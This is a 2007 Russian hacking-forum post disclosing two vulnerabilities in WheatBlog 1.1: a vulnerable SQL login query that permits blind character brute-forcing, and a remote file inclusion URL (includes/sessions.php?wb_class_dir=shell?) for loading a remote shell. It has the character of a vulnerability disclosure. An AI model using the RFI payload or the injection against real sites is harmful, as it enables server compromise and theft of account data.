ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу WheatBlog 1.1 RFI/SQL Injection
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

WheatBlog 1.1 RFI/SQL Injection
  #1  
Старый 30.06.2007, 16:01
Аватар для gemaglabin
gemaglabin
Banned
Регистрация: 01.08.2006
Сообщений: 725
Провел на форуме:
7681825

Репутация: 4451


По умолчанию WheatBlog 1.1 RFI/SQL Injection
SQL иньекция в функции логина , но под чужим аккаунтом не залезть.Возможен посимвольный перебор при условии что magic_quotes_gpc = off

Код:
$sql = "select * from $tblUsers where login = '$login'";
if ( $login	 != $row['login'] )	$valid_user = 0;
		if ( $password  != $row['password'] ) $valid_user = 0;
RFI
Код:
includes/sessions.php?wb_class_dir=shell?
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48
Hacking Databases-SQL Injection Attacks Dracula4ever Комментарии к видео 4 01.02.2007 16:44
CRLF injection Electro Уязвимости 6 22.08.2006 14:28
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ